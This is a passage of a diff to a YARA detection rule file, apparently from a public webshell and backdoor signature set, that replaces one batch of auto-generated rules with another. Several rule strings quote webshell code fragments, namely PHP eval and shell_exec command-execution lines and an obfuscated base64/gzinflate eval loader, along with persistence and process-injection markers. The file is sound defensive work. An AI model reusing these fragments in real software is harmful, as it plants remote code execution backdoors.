+		id = "6b9381e6-597d-5e74-a318-9931d20a9d08"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7115-L7136"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8147-L8159"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "7b3f2ca3cb9516ddda1b9cac2ca5eb5d9e62e1839dad041f69a3dc7a2a186897"
+		hash = "4d87543d4d7f73c1529c9f8066b475ab"
+		logic_hash = "10f86f18aff4995928efb3c8000eca166fe37e6006de7938139cad718ff7653f"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "1a08f5260c4a2614636dfc108091927799776b13"
-		hash1 = "335a0851304acedc3f117782b61479bbc0fd655a"
-		hash2 = "ca9fcfb50645dc0712abdf18d613ed2196e66241"
-		hash3 = "36d8782d749638fdcaeed540d183dd3c8edc6791"
-		hash4 = "03f88f494654f2ad0361fb63e805b6bbfc0c86de"
 
 	strings:
-		$s2 = "@eval(stripslashes($_POST['phpcode']));" fullword
-		$s5 = "echo shell_exec($com);" fullword
-		$s7 = "if($sertype == \"winda\"){" fullword
-		$s8 = "function execute($com)" fullword
-		$s12 = "echo decode(execute($cmd));" fullword
-		$s15 = "echo system($com);" fullword
+		$s2 = "now DOS is working at mode %d,faketype %d,against %s,has worked %d minutes,by sp"
+		$s3 = "sth junk the M$ Wind0wZ retur"
 
 	condition:
-		4 of them
+		all of them
 }
-rule SIGNATURE_BASE_Unpack_Injectt
+rule SIGNATURE_BASE_PHP_Shell
 {
 	meta:
-		description = "Webshells Auto-generated - file Injectt.exe"
+		description = "Webshells Auto-generated - file shell.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "80dc3086-41a6-5e30-bbf4-463500fe5e33"
+		id = "08dff4db-3b1c-5702-a8c9-efaedf83c4ff"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7138-L7151"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8160-L8172"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "8a5d2158a566c87edc999771e12d42c5"
-		logic_hash = "d8e9ed4f2604617bd6410f36ab827affa3cc6729ba996d0d9cd9c8eb0fd96533"
+		hash = "45e8a00567f8a34ab1cccc86b4bc74b9"
+		logic_hash = "a62061b2fa851f5798158198e26f188408f3f37dca69a85ca155777c0b8407ee"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s2 = "%s -Run                              -->To Install And Run The Service"
-		$s3 = "%s -Uninstall                        -->To Uninstall The Service"
-		$s4 = "(STANDARD_RIGHTS_REQUIRED |SC_MANAGER_CONNECT |SC_MANAGER_CREATE_SERVICE |SC_MAN"
+		$s0 = "AR8iROET6mMnrqTpC6W1Kp/DsTgxNby9H1xhiswfwgoAtED0y6wEXTihoAtICkIX6L1+vTUYWuWz"
+		$s11 = "1HLp1qnlCyl5gko8rDlWHqf8/JoPKvGwEm9Q4nVKvEh0b0PKle3zeFiJNyjxOiVepMSpflJkPv5s"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Hytop_Devpack_Fso
+rule SIGNATURE_BASE_Hxdef100
 {
 	meta:
-		description = "Webshells Auto-generated - file fso.asp"
+		description = "Webshells Auto-generated - file hxdef100.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "094eeff9-0da0-5a44-a45c-f8ee57861e7a"
+		id = "fb376c18-02d2-5866-a0e2-ccb5262091dd"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7152-L7164"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8173-L8186"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "b37f3cde1a08890bd822a182c3a881f6"
-		logic_hash = "9d071c1e2e0725091a2abe24759e6e71d78e29caa76b4fff77c44e3bb381b1a2"
+		hash = "55cc1769cef44910bd91b7b73dee1f6c"
+		logic_hash = "a2002dcddad7ffdbe9614723163016f9357347bb704640d3933ce4513c37d474"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "<!-- PageFSO Below -->"
-		$s1 = "theFile.writeLine(\"<script language=\"\"vbscript\"\" runat=server>if request(\"\"\"&cli"
+		$s0 = "RtlAnsiStringToUnicodeString"
+		$s8 = "SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\"
+		$s9 = "\\\\.\\mailslot\\hxdef-rk100sABCDEFGH"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Felikspack3___PHP_Shells_Ssh
+rule SIGNATURE_BASE_Rdrbs100
 {
 	meta:
-		description = "Webshells Auto-generated - file ssh.php"
+		description = "Webshells Auto-generated - file rdrbs100.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "0b971065-df16-5092-beff-c55608447f19"
+		id = "369e5ce0-984c-54eb-96d4-fbfb4f932ba6"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7165-L7176"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8187-L8199"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "1aa5307790d72941589079989b4f900e"
-		logic_hash = "40c5a5d1d714947454f4aa9f7ed09d777cb60c23933201ac8eaf0d49452af8c6"
+		hash = "7c752bcd6da796d80a6830c61a632bff"
+		logic_hash = "8a427ef9e0ecd0c810913203aaef43647964f33658dfdca8195fce6f0545f8f4"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "eval(gzinflate(str_rot13(base64_decode('"
+		$s3 = "Server address must be IP in A.B.C.D format."
+		$s4 = " mapped ports in the list. Currently "
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Debug_Bdoor
+rule SIGNATURE_BASE_Mithril_Mithril
 {
 	meta:
-		description = "Webshells Auto-generated - file BDoor.dll"
+		description = "Webshells Auto-generated - file Mithril.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "0938efe7-2b6d-5749-af9a-967cca85defb"
+		id = "81645f57-7d7e-5b4d-b323-744f2cde4916"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7177-L7189"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8200-L8218"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "e4e8e31dd44beb9320922c5f49739955"
-		logic_hash = "ed8caeb96a6fc48fe23d5db078bbb8ba5aec3c5d4ee382cbc6bc4e01630f1460"
+		hash = "017191562d72ab0ca551eb89256650bd"
+		logic_hash = "5d19eb4132a0401d226c9cffc927b2838e9c69428746296b55a488d097759587"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "\\BDoor\\"
-		$s4 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"
+		$s0 = "OpenProcess error!"
+		$s1 = "WriteProcessMemory error!"
+		$s4 = "GetProcAddress error!"
+		$s5 = "HHt`HHt\\"
+		$s6 = "Cmaudi0"
+		$s7 = "CreateRemoteThread error!"
+		$s8 = "Kernel32"
+		$s9 = "VirtualAllocEx error!"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Bin_Client
+rule SIGNATURE_BASE_Hxdef100_2
 {
 	meta:
-		description = "Webshells Auto-generated - file Client.exe"
+		description = "Webshells Auto-generated - file hxdef100.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "8564d787-5edc-59b0-b1ef-2f33c8a24f82"
+		id = "1f079b73-29de-50cf-868c-1639a43e576f"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7190-L7204"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8219-L8232"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "5f91a5b46d155cacf0cc6673a2a5461b"
-		logic_hash = "28ce9aa136b5d41bb580e6b5b8580d3ccbb7eeec31007e68241d23c5a0f40d40"
+		hash = "1b393e2e13b9c57fb501b7cd7ad96b25"
+		logic_hash = "d44131f6c1bfdc36079f474832a79a361dfad96d1b84f7004d682150c93eccc5"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "Recieved respond from server!!"
-		$s4 = "packet door client"
-		$s5 = "input source port(whatever you want):"
-		$s7 = "Packet sent,waiting for reply..."
+		$s0 = "\\\\.\\mailslot\\hxdef-rkc000"
+		$s2 = "Shared Components\\On Access Scanner\\BehaviourBlo"
+		$s6 = "SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Zxshell2_0_Rar_Folder_Zxshell
+rule SIGNATURE_BASE_Release_Dlltest
 {
 	meta:
-		description = "Webshells Auto-generated - file ZXshell.exe"
+		description = "Webshells Auto-generated - file dllTest.dll"
 		author = "Florian Roth (Nextron Systems)"
-		id = "621ac87e-b1f8-58d7-9328-54af5ca9b605"
+		id = "af821252-8409-5572-9014-59e8c5feaacd"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7205-L7217"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8233-L8253"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "246ce44502d2f6002d720d350e26c288"
-		logic_hash = "72eaf90551144eccb7329e0a0e05bcc955ea2bfdb37aa87e9cae7b5f5a26bea0"
-		score = 75
+		hash = "76a59fc3242a2819307bb9d593bef2e0"
+		logic_hash = "ba759ae1bbde357085b2b2dfda0780b5a239a44b4e999244e8eceed246090ce3"
+		score = 50
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "WPreviewPagesn"
-		$s1 = "DA!OLUTELY N"
+		$s0 = ";;;Y;`;d;h;l;p;t;x;|;"
+		$s1 = "0 0&00060K0R0X0f0l0q0w0"
+		$s2 = ": :$:(:,:0:4:8:D:`=d="
+		$s3 = "4@5P5T5\\5T7\\7d7l7t7|7"
+		$s4 = "1,121>1C1K1Q1X1^1e1k1s1y1"
+		$s5 = "9 9$9(9,9P9X9\\9`9d9h9l9p9t9x9|9"
+		$s6 = "0)0O0\\0a0o0\"1E1P1q1"
+		$s7 = "<.<I<d<h<l<p<t<x<|<"
+		$s8 = "3&31383>3F3Q3X3`3f3w3|3"
+		$s9 = "8@;D;H;L;P;T;X;\\;a;9=W=z="
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Rkntload
+rule SIGNATURE_BASE_Webadmin
 {
 	meta:
-		description = "Webshells Auto-generated - file RkNTLoad.exe"
+		description = "Webshells Auto-generated - file webadmin.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "fd4b1343-5fa9-5ad8-bee1-6b06b93ddfbe"
+		id = "615d87f8-9094-5994-aea1-d7276623fbca"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7218-L7236"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8254-L8265"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "262317c95ced56224f136ba532b8b34f"
-		logic_hash = "ab767a7016318633055a85195ca2bab08a8c68222d46018aaf8772ab27a373c4"
+		hash = "3a90de401b30e5b590362ba2dde30937"
+		logic_hash = "6e215c3d8b8357b839416ee6951f7739387bb94aa1284ea7e827ae2205221294"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "$Info: This file is packed with the UPX executable packer http://upx.tsx.org $"
-		$s2 = "5pur+virtu!"
-		$s3 = "ugh spac#n"
-		$s4 = "xcEx3WriL4"
-		$s5 = "runtime error"
-		$s6 = "loseHWait.Sr."
-		$s7 = "essageBoxAw"
-		$s8 = "$Id: UPX 1.07 Copyright (C) 1996-2001 the UPX Team. All Rights Reserved. $"
+		$s0 = "<input name=\\\"editfilename\\\" type=\\\"text\\\" class=\\\"style1\\\" value='\".$this->inpu"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Binder2_Binder2
+rule SIGNATURE_BASE_Commands
 {
 	meta:
-		description = "Webshells Auto-generated - file binder2.exe"
+		description = "Webshells Auto-generated - file commands.asp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "29269dc0-f2e4-56ec-ad64-0dff00e339b7"
+		id = "7cffefc7-4f24-5908-82a4-f11eda398377"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7237-L7253"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8266-L8278"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "d594e90ad23ae0bc0b65b59189c12f11"
-		logic_hash = "fbe56b7d37fc7863fcf55761c0b5b671d661a713ac95f90d65b79eee9a447a9b"
+		hash = "174486fe844cb388e2ae3494ac2d1ec2"
+		logic_hash = "5251ee090934c8f99a8a2ffef2605593943306937dc56a135a47f1da7e732587"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "IsCharAlphaNumericA"
-		$s2 = "WideCharToM"
-		$s4 = "g 5pur+virtu!"
-		$s5 = "\\syslog.en"
-		$s6 = "heap7'7oqk?not="
-		$s8 = "- Kablto in"
+		$s1 = "If CheckRecord(\"SELECT COUNT(ID) FROM VictimDetail WHERE VictimID = \" & VictimID"
+		$s2 = "proxyArr = Array (\"HTTP_X_FORWARDED_FOR\",\"HTTP_VIA\",\"HTTP_CACHE_CONTROL\",\"HTTP_F"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Thelast_Orice2
+rule SIGNATURE_BASE_Hkdoordll
 {
 	meta:
-		description = "Webshells Auto-generated - file orice2.php"
+		description = "Webshells Auto-generated - file hkdoordll.dll"
 		author = "Florian Roth (Nextron Systems)"
-		id = "968cef9e-0163-5f4a-91e3-07510f9f4fcd"
+		id = "c4cfb575-89c3-5a72-8bf5-234d4284fe9d"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7254-L7266"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8279-L8290"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "aa63ffb27bde8d03d00dda04421237ae"
-		logic_hash = "075f3377a9b90c6c1ba74682415b9c0832a839afe647fa6d3c85d4e987618405"
+		hash = "b715c009d47686c0e62d0981efce2552"
+		logic_hash = "a3c4d262b59cdf82390c0457810505e9e7a18c9b26ba4524bc368fd2141ec306"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = " $aa = $_GET['aa'];"
-		$s1 = "echo $aa;"
+		$s6 = "Can't uninstall,maybe the backdoor is not installed or,the Password you INPUT is"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_FSO_S_Sincap
+rule SIGNATURE_BASE_R57Shell_2
 {
 	meta:
-		description = "Webshells Auto-generated - file sincap.php"
+		description = "Webshells Auto-generated - file r57shell.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "fcee20a3-e71b-5f69-ac67-8660fd270703"
+		id = "d3a3fe11-c9e1-523b-88a3-ddc0c1085d04"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7267-L7279"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8291-L8302"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "dc5c2c2392b84a1529abd92e98e9aa5b"
-		logic_hash = "705030e93248f5ea6744f78bd7a1816aaa9772880059286b8d686e05b193d4a0"
+		hash = "8023394542cddf8aee5dec6072ed02b5"
+		logic_hash = "5319426928d33b62527efb561c2b7a226a5a473735f501b267e6b3b174972085"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "    <font color=\"#E5E5E5\" style=\"font-size: 8pt; font-weight: 700\" face=\"Arial\">"
-		$s4 = "<body text=\"#008000\" bgcolor=\"#808080\" topmargin=\"0\" leftmargin=\"0\" rightmargin="
+		$s2 = "echo \"<br>\".ws(2).\"HDD Free : <b>\".view_size($free).\"</b> HDD Total : <b>\".view_"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Phpshell
+rule SIGNATURE_BASE_Mithril_V1_45_Dlltest
 {
 	meta:
-		description = "Webshells Auto-generated - file PhpShell.php"
+		description = "Webshells Auto-generated - file dllTest.dll"
 		author = "Florian Roth (Nextron Systems)"
-		id = "887264d3-5704-5e38-b0a6-44d529258ea2"
+		id = "2aea84b6-1b51-58cd-b52b-c31b1f75d295"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7280-L7291"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8303-L8316"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "539baa0d39a9cf3c64d65ee7a8738620"
-		logic_hash = "95b3cedac370bf9b06092035a738722f3ec97e6cbafe3d4f742429a865576ad8"
-		score = 75
+		hash = "1b9e518aaa62b15079ff6edb412b21e9"
+		logic_hash = "cf1e2ca39ae6b726792bbbaf0f1dd90788a4bb9ba5e3d50c22d75f2b3d4e9e7d"
+		score = 50
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s2 = "href=\"http://www.gimpster.com/wiki/PhpShell\">www.gimpster.com/wiki/PhpShell</a>."
+		$s3 = "syspath"
+		$s4 = "\\Mithril"
+		$s5 = "--list the services in the computer"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Hytop_Devpack_Config
+rule SIGNATURE_BASE_Dbgiis6Cli
 {
 	meta:
-		description = "Webshells Auto-generated - file config.asp"
+		description = "Webshells Auto-generated - file dbgiis6cli.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "da1b8ce1-8b17-53f6-a86b-ad3fe918084e"
+		id = "2bc59a6b-f45c-5e68-a346-ac56e8f2757b"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7292-L7305"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8317-L8329"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "b41d0e64e64a685178a3155195921d61"
-		logic_hash = "b2806c30db413bca518943352f233c9d2915356a41eceed5e352b88ee34fbbd3"
+		hash = "3044dceb632b636563f66fee3aaaf8f3"
+		logic_hash = "f6de3c9b8fbcca230540d1b41659ab02c9548df69f53fa9d5730ac7bb7dfe88a"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "const adminPassword=\""
-		$s2 = "const userPassword=\""
-		$s3 = "const mVersion="
+		$s0 = "User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
+		$s5 = "###command:(NO more than 100 bytes!)"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Sendmail
+rule SIGNATURE_BASE_Remview_2003_04_22
 {
 	meta:
-		description = "Webshells Auto-generated - file sendmail.exe"
+		description = "Webshells Auto-generated - file remview_2003_04_22.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "dd33c2bb-61bf-57b7-82b9-d864097f7a56"
+		id = "3088ee27-42a3-5140-98de-ab6f87c7748b"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7306-L7318"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8330-L8341"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "75b86f4a21d8adefaf34b3a94629bd17"
-		logic_hash = "bcca9a9380d2695bc277afc9fa72c24cb26ac44c6fbcc87113b017cfe190bdab"
+		hash = "17d3e4e39fbca857344a7650f7ea55e3"
+		logic_hash = "2957f6ec7a022ac04759724276f6928625708346903597b0765b5e81207fc6b9"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s3 = "_NextPyC808"
-		$s6 = "Copyright (C) 2000, Diamond Computer Systems Pty. Ltd. (www.diamondcs.com.au)"
+		$s1 = "\"<b>\".mm(\"Eval PHP code\").\"</b> (\".mm(\"don't type\").\" \\\"&lt;?\\\""
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_FSO_S_Zehir4
+rule SIGNATURE_BASE_FSO_S_Test
 {
 	meta:
-		description = "Webshells Auto-generated - file zehir4.asp"
+		description = "Webshells Auto-generated - file test.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "9f1adcd6-b721-54ef-a20f-c3a353629a40"
+		id = "b0cc5a2a-c741-50dd-854f-5a43769e8f47"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7319-L7330"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8342-L8354"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "5b496a61363d304532bcf52ee21f5d55"
-		logic_hash = "6bcfb1ee40403394bf996ecbe1bb17f9afa0c3ba9e1906881b94bbc785b4a510"
-		score = 75
+		hash = "82cf7b48da8286e644f575b039a99c26"
+		logic_hash = "62613bead716717f116290b1c9eca9aa63eadd280050811e30a54e5d186af2fc"
+		score = 50
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s5 = " byMesaj "
+		$s0 = "$yazi = \"test\" . \"\\r\\n\";"
+		$s2 = "fwrite ($fp, \"$yazi\");"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Hkshell_Hkshell
+rule SIGNATURE_BASE_Debug_Cress
 {
 	meta:
-		description = "Webshells Auto-generated - file hkshell.exe"
+		description = "Webshells Auto-generated - file cress.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "7436cd7c-7027-56dc-bb62-fac0f70c27d8"
+		id = "6cf3e43c-bec1-5688-b1d7-8ac48d59153a"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7331-L7344"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8355-L8367"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "168cab58cee59dc4706b3be988312580"
-		logic_hash = "bee4d4c957ede41c771d690d52ac2fd3655238cc1fc106d30fb2721084b38aa1"
+		hash = "36a416186fe010574c9be68002a7286a"
+		logic_hash = "670e236e72d3cb52ea5dba865749baee58a70f8d100db1dd8eddfe3183339181"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "PrSessKERNELU"
-		$s2 = "Cur3ntV7sion"
-		$s3 = "Explorer8"
+		$s0 = "\\Mithril "
+		$s4 = "Mithril.exe"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Imhapftp
+rule SIGNATURE_BASE_Webshell
 {
 	meta:
-		description = "Webshells Auto-generated - file iMHaPFtp.php"
+		description = "Webshells Auto-generated - file webshell.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c810c630-ce08-5059-ad49-f65b244f4d19"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7345-L7356"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8368-L8383"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "12911b73bc6a5d313b494102abcf5c57"
-		logic_hash = "c24bb80a0ae4284b4303450e9103c5dda30c41b41f323641ac1175461f741ced"
+		hash = "f2f8c02921f29368234bfb4d4622ad19"
+		logic_hash = "e3fdce426d2f6e88d8e9412a3026ea05d027af934763eafe0188602458c2289d"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "echo \"\\t<th class=\\\"permission_header\\\"><a href=\\\"$self?{$d}sort=permission$r\\\">"
+		$s0 = "RhViRYOzz"
+		$s1 = "d\\O!jWW"
+		$s2 = "bc!jWW"
+		$s3 = "0W[&{l"
+		$s4 = "[INhQ@\\"
 
 	condition:
